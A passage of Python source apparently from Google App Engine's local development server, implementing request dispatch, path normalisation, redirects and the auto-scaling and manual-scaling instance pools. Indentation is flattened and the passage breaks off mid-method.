path_info = environ['PATH_INFO']
path_info_normal = self._normpath(path_info)
if path_info_normal != path_info:
# While a 301 Moved Permanently makes more sense for non-normal
# paths, prod issues a 302 so we do the same.
return self._redirect_302_path_info(path_info_normal,
environ,
wrapped_start_response)
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(path_info)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except Exception as e:
logging.exception('Request to %r failed', path_info)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
return _THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
@staticmethod
def _quote_querystring(qs):
"""Quote a query string to protect against XSS."""
parsed_qs = six.moves.urllib.parse.parse_qs(qs, keep_blank_values=True)
# urlparse.parse returns a dictionary with values as lists while
# urllib.urlencode does not handle those. Expand to a list of
# key values.
expanded_qs = []
for key, multivalue in list(parsed_qs.items()):
for value in multivalue:
expanded_qs.append((key, value))
return six.moves.urllib.parse.urlencode(expanded_qs)
def _redirect_302_path_info(self, updated_path_info, environ, start_response):
"""Redirect to an updated path.
Respond to the current request with a 302 Found status with an updated path
but preserving the rest of the request.
Notes:
- WSGI does not make the fragment available so we are not able to preserve
it. Luckily prod does not preserve the fragment so it works out.
Args:
updated_path_info: the new HTTP path to redirect to.
environ: WSGI environ object.
start_response: WSGI start response callable.
Returns:
WSGI-compatible iterable object representing the body of the response.
"""
correct_url = six.moves.urllib.parse.urlunsplit(
(environ['wsgi.url_scheme'],
environ['HTTP_HOST'],
six.moves.urllib.parse.quote(updated_path_info),
self._quote_querystring(environ['QUERY_STRING']),
None))
content_type = 'text/html; charset=utf-8'
output = _REDIRECT_HTML % {
'content-type': content_type,
'status': six.moves.http_client.FOUND,
'correct-url': correct_url
}
start_response('%d %s' % (six.moves.http_client.FOUND, six.moves.http_client.responses[six.moves.http_client.FOUND]),
[('Content-Type', content_type),
('Location', correct_url),
('Content-Length', str(len(output)))])
return output
@staticmethod
def _normpath(path):
"""Normalize the path by handling . and .. directory entries.
Normalizes the path. A directory entry of . is just dropped while a
directory entry of .. removes the previous entry. Note that unlike
os.path.normpath, redundant separators remain in place to match prod.
Args:
path: an HTTP path.
Returns:
A normalized HTTP path.
"""
normalized_path_entries = []
for entry in path.split('/'):
if entry == '..':
if normalized_path_entries:
normalized_path_entries.pop()
elif entry != '.':
normalized_path_entries.append(entry)
return '/'.join(normalized_path_entries)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
Raises:
request_info.NotSupportedWithAutoScalingError: Always.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_host,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_config,
self._python_config,
self._java_config,
self._cloud_sql_config,
self._vm_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files,
self._threadsafe_override)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, six.text_type):
body = body.encode('ascii')
url = six.moves.urllib.parse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': io.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': io.StringIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
unused_vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
unused_vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. Ignored by AutoScalingModule as
autoscaling is not yet supported by VM runtimes.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
# VM runtimes does not support
# autoscaling.
None,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containg (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances have already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
return _THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
return int(math.ceil(old_div(peak_concurrent_requests,
self.max_instance_concurrent_requests)))
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Module that not are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
"""Returns the best Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
required_instances, not_required_instances = self._split_instances()
if required_instances:
# Pick the instance with the most remaining capacity to handle
# requests.
required_instances = sorted(
required_instances,
key=lambda inst: inst.remaining_request_capacity)
if required_instances[-1].remaining_request_capacity:
return required_instances[-1]
available_instances = [inst for inst in not_required_instances
if inst.remaining_request_capacity > 0 and
inst.can_accept_requests]
if available_instances:
# Pick the instance with the *least* capacity to handle requests
# to avoid using unnecessary idle instances.
available_instances.sort(
key=lambda instance: instance.num_outstanding_requests)
return available_instances[-1]
else:
self._condition.wait(timeout_time - time.time())
return None
def _adjust_instances(self):
"""Creates new Instances or deletes idle Instances based on current load."""
now = time.time()
with self._condition:
_, not_required_instances = self._split_instances()
if len(not_required_instances) < self._min_idle_instances:
self._add_instance(permit_warmup=True)
elif (len(not_required_instances) > self._max_idle_instances and
now >
(self._last_instance_quit_time + self._MIN_SECONDS_BETWEEN_QUITS)):
for inst in not_required_instances:
if not inst.num_outstanding_requests:
try:
inst.quit()
except instance.CannotQuitServingInstance:
pass
else:
self._last_instance_quit_time = now
logging.debug('Quit instance: %s', inst)
with self._condition:
self._instances.discard(inst)
break
def _loop_adjusting_instances(self):
"""Loops until the Module exits, reloading, adding or removing Instances."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._adjust_instances()
self._quit_event.wait(timeout=1)
def __call__(self, environ, start_response):
return self._handle_request(environ, start_response)
class ManualScalingModule(Module):
"""A pool of instances that is manually-scaled."""
_DEFAULT_MANUAL_SCALING = appinfo.ManualScaling(instances='1')
@classmethod
def _populate_default_manual_scaling(cls, manual_scaling):
for attribute in manual_scaling.ATTRIBUTES:
if getattr(manual_scaling, attribute) in ('manual', None):
setattr(manual_scaling, attribute,
getattr(cls._DEFAULT_MANUAL_SCALING, attribute))
def _process_manual_scaling(self, manual_scaling):
if manual_scaling:
self._populate_default_manual_scaling(manual_scaling)
else:
manual_scaling = self._DEFAULT_MANUAL_SCALING
self._initial_num_instances = int(manual_scaling.instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for ManualScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instances containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(ManualScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_manual_scaling(module_configuration.manual_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# Whether the module has been stopped. Protected by self._condition.
self._suspended = False
self._condition = threading.Condition() # Protects instance state.
# Serializes operations that modify the serving state of or number of
# instances.
self._instances_change_lock = threading.RLock()
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
with self._instances_change_lock:
if self._max_instances is not None:
initial_num_instances = min(self._max_instances,
self._initial_num_instances)
else:
initial_num_instances = self._initial_num_instances
for _ in range(initial_num_instances):
self._add_instance()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
inst.wait(timeout_time)
if inst.has_quit:
return self._error_response(environ, start_response, 503)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._get_wait_time()
while time.time() < timeout_time:
if ((request_type in (instance.NORMAL_REQUEST, instance.READY_REQUEST) and
self._suspended) or self._quit_event.is_set()):
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503, _TIMEOUT_HTML)
def _add_instance(self):
"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
health_check_config = self.module_configuration.vm_health_check
if (self.module_configuration.runtime == 'vm' and
health_check_config.enable_health_check):
self._add_health_checks(inst, wsgi_servr, health_check_config)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _add_health_checks(self, inst, wsgi_servr, config):
do_health_check = functools.partial(
self._do_health_check, wsgi_servr, inst)
restart_instance = functools.partial(
self._restart_instance, inst)
health_checker = health_check_service.HealthChecker(
inst, config, do_health_check, restart_instance)
health_checker.start()
def _async_start_instance(self, wsgi_servr, inst):
return _THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
try:
if not inst.start():
return
except:
logging.exception('Internal error while starting instance.')
raise
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except Exception as e: # pylint: disable=broad-except
logging.exception('Internal error while handling start request: %s', e)
def _do_health_check(self, wsgi_servr, inst, start_response,
is_last_successful):
is_last_successful = 'yes' if is_last_successful else 'no'
url = '/_ah/health?%s' % six.moves.urllib.parse.urlencode(
[('IsLastSuccessful', is_last_successful)])
environ = self.build_request_environ(
'GET', url, [], '', '', wsgi_servr.port,
fake_login=True)
return self._handle_request(
environ,
start_response,
inst=inst,
request_type=instance.NORMAL_REQUEST)
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
logging.info(
'Detected file changes:\n %s', '\n '.join(sorted(file_changes)))
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in range(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
return _THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.VersionAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = list(zip(self._instances, self._wsgi_servers))
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
